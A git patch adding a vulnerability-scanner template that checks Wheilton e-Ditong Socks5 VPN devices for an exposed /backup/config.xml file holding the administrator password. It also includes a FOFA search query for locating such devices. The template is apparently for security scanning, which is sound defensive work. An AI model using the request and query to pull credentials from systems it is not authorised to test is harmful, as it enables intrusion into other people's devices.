From 86d0322ea5681b4e380e628a8468be841b37d678 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Sat, 5 Aug 2023 22:48:45 +0530
Subject: [PATCH] Create socks5-vpn-config.yaml

---
 http/exposures/files/socks5-vpn-config.yaml | 39 +++++++++++++++++++++
 1 file changed, 39 insertions(+)
 create mode 100644 http/exposures/files/socks5-vpn-config.yaml

diff --git a/http/exposures/files/socks5-vpn-config.yaml b/http/exposures/files/socks5-vpn-config.yaml
new file mode 100644
index 0000000000..39eb4ef5a4
--- /dev/null
+++ b/http/exposures/files/socks5-vpn-config.yaml
@@ -0,0 +1,39 @@
+id: socks5-vpn-config
+
+info:
+  name: Socks5 VPN config.xml - File Disclosure
+  author: DhiyaneshDk
+  severity: high
+  description: |
+    Information Leakage in the Socks5 VPN login system of Wheilton e-Ditong, and the administrator account password can be obtained by visiting a specially crafted URL.
+  reference:
+    - https://github.com/Threekiii/Awesome-POC/blob/master/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E6%83%A0%E5%B0%94%E9%A1%BF%20e%E5%9C%B0%E9%80%9A%20config.xml%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
+    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E6%83%A0%E5%B0%94%E9%A1%BF/%E6%83%A0%E5%B0%94%E9%A1%BF%20e%E5%9C%B0%E9%80%9A%20config.xml%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md?plain=1
+  metadata:
+    max-request: 1
+    fofa-query: app="惠尔顿-e地通VPN"
+    verified: true
+  tags: esocks5,exposure,misconfig,files
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/backup/config.xml"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<config>"
+          - "password"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/xml"
+
+      - type: status
+        status:
+          - 200